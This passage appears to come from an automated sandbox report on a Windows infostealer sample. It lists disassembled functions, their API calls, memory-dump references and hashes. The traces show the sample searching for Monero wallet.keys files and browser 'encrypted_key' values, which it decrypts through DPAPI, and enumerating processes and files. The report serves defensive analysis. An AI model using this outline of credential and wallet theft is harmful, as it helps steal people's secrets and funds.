                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                        • String ID:
                        • API String ID: 211194620-0
                        • Opcode ID: 3ab8014c6c3fb2245c93d64ee45e5da72aa21dfc670d8719af0b4d8c2d4c27f0
                        • Instruction ID: ef146df3853f2c4ef3331f23d8f9e6f708beb079a7015fb2c183f0550584b445
                        • Opcode Fuzzy Hash: 3ab8014c6c3fb2245c93d64ee45e5da72aa21dfc670d8719af0b4d8c2d4c27f0
                        • Instruction Fuzzy Hash: BD91ED729111089ADB88FBE4DC92EEE737AAF15300F50416EF50766091EF346E49CF6A
                        Function 0069D780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788
                          • Part of subcall function 006AA9B0: lstrlen.KERNEL32(?,012691F0,?,\Monero\wallet.keys,006B0E17), ref: 006AA9C5
                          • Part of subcall function 006AA9B0: lstrcpy.KERNEL32(00000000), ref: 006AAA04
                          • Part of subcall function 006AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006AAA12
                          • Part of subcall function 006AA8A0: lstrcpy.KERNEL32(?,006B0E17), ref: 006AA905
                          • Part of subcall function 006A8B60: GetSystemTime.KERNEL32(006B0E1A,0126B828,006B05AE,?,?,006913F9,?,0000001A,006B0E1A,00000000,?,012691F0,?,\Monero\wallet.keys,006B0E17), ref: 006A8B86
                          • Part of subcall function 006AA920: lstrcpy.KERNEL32(00000000,?), ref: 006AA972
                          • Part of subcall function 006AA920: lstrcat.KERNEL32(00000000), ref: 006AA982
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0069D801
                        • lstrlen.KERNEL32(00000000), ref: 0069D99F
                        • lstrlen.KERNEL32(00000000), ref: 0069D9B3
                        • DeleteFileA.KERNEL32(00000000), ref: 0069DA32
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                        • String ID:
                        • API String ID: 211194620-0
                        • Opcode ID: 4bb0663877d0d881c8c3cb04cca67eb9aaf24a5e4b1326606ab89a98eb6502b5
                        • Instruction ID: ec4fa0cc5a3bb6b965317fc3fc70457395b38941be1a3c294e1dde289388d8eb
                        • Opcode Fuzzy Hash: 4bb0663877d0d881c8c3cb04cca67eb9aaf24a5e4b1326606ab89a98eb6502b5
                        • Instruction Fuzzy Hash: D181DD719111089ADB88FBE4DC56AEE737AAF15300F50452EF507A6091EF346E09CF66
                        Function 006A70D0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 140COMMON
                        Download Yara Rule
                        Strings
                        • sj, xrefs: 006A7111
                        • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 006A718C
                        • sj, xrefs: 006A72AE, 006A7179, 006A717C
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy
                        • String ID: sj$sj$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                        • API String ID: 3722407311-1829183765
                        • Opcode ID: ee0f78ab32e0d68763641ec86b13d2debf254814be2bace988a7df3406253f9f
                        • Instruction ID: 3f5bc1d3ce9f236983abab34819ce9f80fecef59a323ac78d69b8e1a04f6e764
                        • Opcode Fuzzy Hash: ee0f78ab32e0d68763641ec86b13d2debf254814be2bace988a7df3406253f9f
                        • Instruction Fuzzy Hash: B0518FB0D042089FDB64FB90DC85BEEB7B6AF55304F1441ADE21567282EB746E88CF58
                        Function 006A3560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen
                        • String ID:
                        • API String ID: 367037083-0
                        • Opcode ID: 66824cb0c3823c4b4c26ab8525d1606a757f3493ca10b8678877a02684c6d88d
                        • Instruction ID: b254e5bc8835d62897b8d702fbf0e5ef272e9480f62383530ff56a49e0ee1728
                        • Opcode Fuzzy Hash: 66824cb0c3823c4b4c26ab8525d1606a757f3493ca10b8678877a02684c6d88d
                        • Instruction Fuzzy Hash: 3A415CB5D10109AFCB44FFE4D845AFEB7BAAB45304F108019F51276290EB34AA45CFA5
                        Function 00699CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788
                          • Part of subcall function 006999C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006999EC
                          • Part of subcall function 006999C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00699A11
                          • Part of subcall function 006999C0: LocalAlloc.KERNEL32(00000040,?), ref: 00699A31
                          • Part of subcall function 006999C0: ReadFile.KERNEL32(000000FF,?,00000000,0069148F,00000000), ref: 00699A5A
                          • Part of subcall function 006999C0: LocalFree.KERNEL32(0069148F), ref: 00699A90
                          • Part of subcall function 006999C0: CloseHandle.KERNEL32(000000FF), ref: 00699A9A
                          • Part of subcall function 006A8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 006A8E52
                        • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00699D39
                          • Part of subcall function 00699AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Ni,00000000,00000000), ref: 00699AEF
                          • Part of subcall function 00699AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00694EEE,00000000,?), ref: 00699B01
                          • Part of subcall function 00699AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Ni,00000000,00000000), ref: 00699B2A
                          • Part of subcall function 00699AC0: LocalFree.KERNEL32(?,?,?,?,00694EEE,00000000,?), ref: 00699B3F
                          • Part of subcall function 00699B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00699B84
                          • Part of subcall function 00699B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00699BA3
                          • Part of subcall function 00699B60: LocalFree.KERNEL32(?), ref: 00699BD3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                        • String ID: $"encrypted_key":"$DPAPI
                        • API String ID: 2100535398-738592651
                        • Opcode ID: 9d0dedd6ed9a672a0a6fb22be721f2d8efa819dbea89b59b43ee64327baa2d07
                        • Instruction ID: a8d3a2ac62e1aaf85b5b4252b1a097c2538ec6061acda280fe2b67579aa42999
                        • Opcode Fuzzy Hash: 9d0dedd6ed9a672a0a6fb22be721f2d8efa819dbea89b59b43ee64327baa2d07
                        • Instruction Fuzzy Hash: 253130B5D10109ABCF04EBE8DC85AFFB7BABF49304F14451DE905A7241E7349A44CBA5
                        Function 006A8680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,006B05B7), ref: 006A86CA
                        • Process32First.KERNEL32(?,00000128), ref: 006A86DE
                        • Process32Next.KERNEL32(?,00000128), ref: 006A86F3
                          • Part of subcall function 006AA9B0: lstrlen.KERNEL32(?,012691F0,?,\Monero\wallet.keys,006B0E17), ref: 006AA9C5
                          • Part of subcall function 006AA9B0: lstrcpy.KERNEL32(00000000), ref: 006AAA04
                          • Part of subcall function 006AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006AAA12
                          • Part of subcall function 006AA8A0: lstrcpy.KERNEL32(?,006B0E17), ref: 006AA905
                        • CloseHandle.KERNEL32(?), ref: 006A8761
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                        • String ID:
                        • API String ID: 1066202413-0
                        • Opcode ID: 0e07c5a1e3774772d0a0852cb733dd2fd2c0d6372d101a2d483fad7567e022d8
                        • Instruction ID: 24a69466e996a197aa41d53b5ac417e176338160f2eaf49d6b374c2d511fbf61
                        • Opcode Fuzzy Hash: 0e07c5a1e3774772d0a0852cb733dd2fd2c0d6372d101a2d483fad7567e022d8
                        • Instruction Fuzzy Hash: E0314F71901218ABCBA4EF94CC45FEEB779FB46700F10429EE50AA2190DB346E45CFA1
                        Function 006A7980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,006B0E00,00000000,?), ref: 006A79B0
                        • RtlAllocateHeap.NTDLL(00000000), ref: 006A79B7
                        • GetLocalTime.KERNEL32(?,?,?,?,?,006B0E00,00000000,?), ref: 006A79C4
                        • wsprintfA.USER32 ref: 006A79F3
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateLocalProcessTimewsprintf
                        • String ID:
                        • API String ID: 377395780-0
                        • Opcode ID: 07abde08ea2fa19c5793be513631f6deadbeb0c139b64c6d396d036c1a624299
                        • Instruction ID: 3f42e3b0e47451a647fbbaf998420d2af77329c5588b1f72523a10e15f18db93
                        • Opcode Fuzzy Hash: 07abde08ea2fa19c5793be513631f6deadbeb0c139b64c6d396d036c1a624299
                        • Instruction Fuzzy Hash: E3112AB2904118ABCB14DFC9DD45BBEB7F8FB4CB11F10421AFA05A2280D7399940DBB1
                        Function 006AC742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • __getptd.LIBCMT ref: 006AC74E
                          • Part of subcall function 006ABF9F: __amsg_exit.LIBCMT ref: 006ABFAF
                        • __getptd.LIBCMT ref: 006AC765
                        • __amsg_exit.LIBCMT ref: 006AC773
                        • __updatetlocinfoEx_nolock.LIBCMT ref: 006AC797
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                        • String ID:
                        • API String ID: 300741435-0
                        • Opcode ID: 545a576d6d43f8dfd2923db08efcb399cb4f3705d41349c72d34806545de2f9d
                        • Instruction ID: a16fb6ab7003d5cbd9dda262588bce2a76fe2cdfe3e240d0775e5f2d5e477e4b
                        • Opcode Fuzzy Hash: 545a576d6d43f8dfd2923db08efcb399cb4f3705d41349c72d34806545de2f9d
                        • Instruction Fuzzy Hash: 45F090729006049FD7A1BFB85806B8D73A3AF02730F24514DF404A62D3CB649D81DF9E
                        Function 006A4F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 006A8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 006A8E0B
                        • lstrcat.KERNEL32(?,00000000), ref: 006A4F7A
                        • lstrcat.KERNEL32(?,006B1070), ref: 006A4F97
                        • lstrcat.KERNEL32(?,01269190), ref: 006A4FAB
                        • lstrcat.KERNEL32(?,006B1074), ref: 006A4FBD
                          • Part of subcall function 006A4910: wsprintfA.USER32 ref: 006A492C
                          • Part of subcall function 006A4910: FindFirstFileA.KERNEL32(?,?), ref: 006A4943
                          • Part of subcall function 006A4910: StrCmpCA.SHLWAPI(?,006B0FDC), ref: 006A4971
                          • Part of subcall function 006A4910: StrCmpCA.SHLWAPI(?,006B0FE0), ref: 006A4987
                          • Part of subcall function 006A4910: FindNextFileA.KERNEL32(000000FF,?), ref: 006A4B7D
                          • Part of subcall function 006A4910: FindClose.KERNEL32(000000FF), ref: 006A4B92
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                        • String ID:
                        • API String ID: 2667927680-0
                        • Opcode ID: cdc41293ba9d231648d1aff1db9dba863deef8bdaa3edff432715e984753af19
                        • Instruction ID: ec403992bb3081ecc47b7592101c25b84e5a4b7b685681d10bd8dfd88f23388f
                        • Opcode Fuzzy Hash: cdc41293ba9d231648d1aff1db9dba863deef8bdaa3edff432715e984753af19
                        • Instruction Fuzzy Hash: 7D21D0B69002046BC794F7B0DC46EEE337DB755300F40465DB64557181DE749AC8CF96